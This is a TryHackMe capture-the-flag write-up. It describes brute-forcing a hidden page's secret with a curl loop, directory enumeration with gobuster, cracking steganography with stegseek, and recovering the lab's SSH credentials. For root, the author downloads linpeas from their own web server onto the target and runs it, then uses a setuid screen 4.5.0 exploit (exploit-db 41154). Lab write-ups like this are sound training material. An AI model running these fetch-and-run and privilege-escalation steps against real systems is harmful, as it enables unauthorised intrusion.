## User Flag:
Had to run a Hex Editor
```flatpak run net.werwolv.ImHex```
Replaced the first 8 bytes with 10 bytes for JFIF

Asked me to go to a hidden directory at
th1s_1s_h1dd3n

Asks for a secret, you can query it in the URL with
?secret=73

Loop curls to find the right secret:
```for i in {0..99}; do                              
  res=$(curl -s "http://10.67.189.192/th1s_1s_h1dd3n/?secret=$i")
  echo "$res" | grep -q "That is wrong" || echo "FOUND: $i"
done```


You will then get this:
"Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B"


I believe this is the password for the ssh user account, but I need the username, as hinted by the dialogue. Attempted to navigate to robots.txt or sitemap.xml, nothing on both.
Tried to look at the headers for the site, nothing
```curl -I http://10.67.189.192```

Tried to see if it's revealed in the ssh, did not work
```nc 10.67.189.192 22```

```gobuster dir -u http://10.67.189.192 -w /home/kali/Desktop/SecLists/Discovery/Web-Content/Web-Servers/Apache.txt```
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.67.189.192
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/Desktop/SecLists/Discovery/Web-Content/Web-Servers/Apache.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htaccess            (Status: 403) [Size: 278]
.htpasswd            (Status: 403) [Size: 278]
.htaccess.bak        (Status: 403) [Size: 278]
server-status        (Status: 403) [Size: 278]

```gobuster dir -u http://10.67.189.192/th1s_1s_h1dd3n -w /home/kali/Desktop/SecLists/Discovery/Web-Content/raft-large-files.txt```
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.67.189.192/th1s_1s_h1dd3n
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/Desktop/SecLists/Discovery/Web-Content/raft-large-files.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.php            (Status: 200) [Size: 406]
.htaccess            (Status: 403) [Size: 278]
.                    (Status: 200) [Size: 406]
.html                (Status: 403) [Size: 278]
stylesheet.css       (Status: 200) [Size: 91]
.php                 (Status: 403) [Size: 278]
.htpasswd            (Status: 403) [Size: 278]
.htm                 (Status: 403) [Size: 278]
.htpasswds           (Status: 403) [Size: 278]
.htgroup             (Status: 403) [Size: 278]
wp-forum.phps        (Status: 403) [Size: 278]
.htaccess.bak        (Status: 403) [Size: 278]
.htuser              (Status: 403) [Size: 278]
.htc                 (Status: 403) [Size: 278]
.ht                  (Status: 403) [Size: 278]
.htaccess.old        (Status: 403) [Size: 278]
.htacess             (Status: 403) [Size: 278]
Progress: 37050 / 37050 (100.00%)

Tried to get any localhost, DNS info that could lead back to username with dig
```dig -x 10.67.128.132```
Did not work, no DNS data [NXDOMAIN]

I used steghide on the banner image
```steghide info 5iW7kC8.jpg ```
"5iW7kC8.jpg":
  format: jpeg
  capacity: 6.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "password.txt":
    size: 83.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

As we can see, it has a embedded file "password.txt"

I then used stegseek to bruteforce the pass:
```stegseek 5iW7kC8.jpg /usr/share/wordlists/rockyou.txt```
The passphrase was ""

I didn't think you'd find me! Congratulations!

Here take my password

*axA&GF8dP


```steghide extract -sf thm.jpg```   
Enter passphrase: 
wrote extracted data to "hidden.txt".

Fine you found the password! 
Here's a username 
wbxre
I didn't say I would make it easy for you!

Rotate it with ROT13
joker

## Root Flag:
I wanted to run linpeas on the target PC so I made a pywww folder and copied over my linpeas.sh document
```cp /usr/share/peass/linpeas/linpeas.sh linpeas.sh```

I then set it up on a webserver
```python3 -m http.server 80```

I also did an ifconfig to get my VPN's IP for TryHackMe

I then went back to the target machine and ran
```wget http://[IP Address]:80/linpeas.sh```

used ```chmod +x linpeas.sh```

and did ./linpeas.sh to get some info from it

Linpeas kind of led me astray, I tried some stuff with the CVEs that it found but to no avail. I then went and tried some other boxes and learned some other PE commands I can try. I used 
```find / -perm -4000 2>/dev/null```
to find the commands that I could run at root and found these files:
```/bin/screen-4.5.0
/bin/screen-4.5.0.old```

These files let me run as root after checking ls 
```-la /bin/screen-4.5.0```

I found an exploit that uses a writable log file feature within this screen to give us library execution as root, allowing us to create a root shell on the device.
```https://www.exploit-db.com/download/41154```

I copied the bash over with a python webserver and then ran these 
```sed -i 's/\r$//' screen_exploit.sh``` -- There was some issue with it running so this fixed some headers
```chmod +x screen_exploit.sh```
```./screen_exploit.sh```

I then cat'd the root file and got the flag 
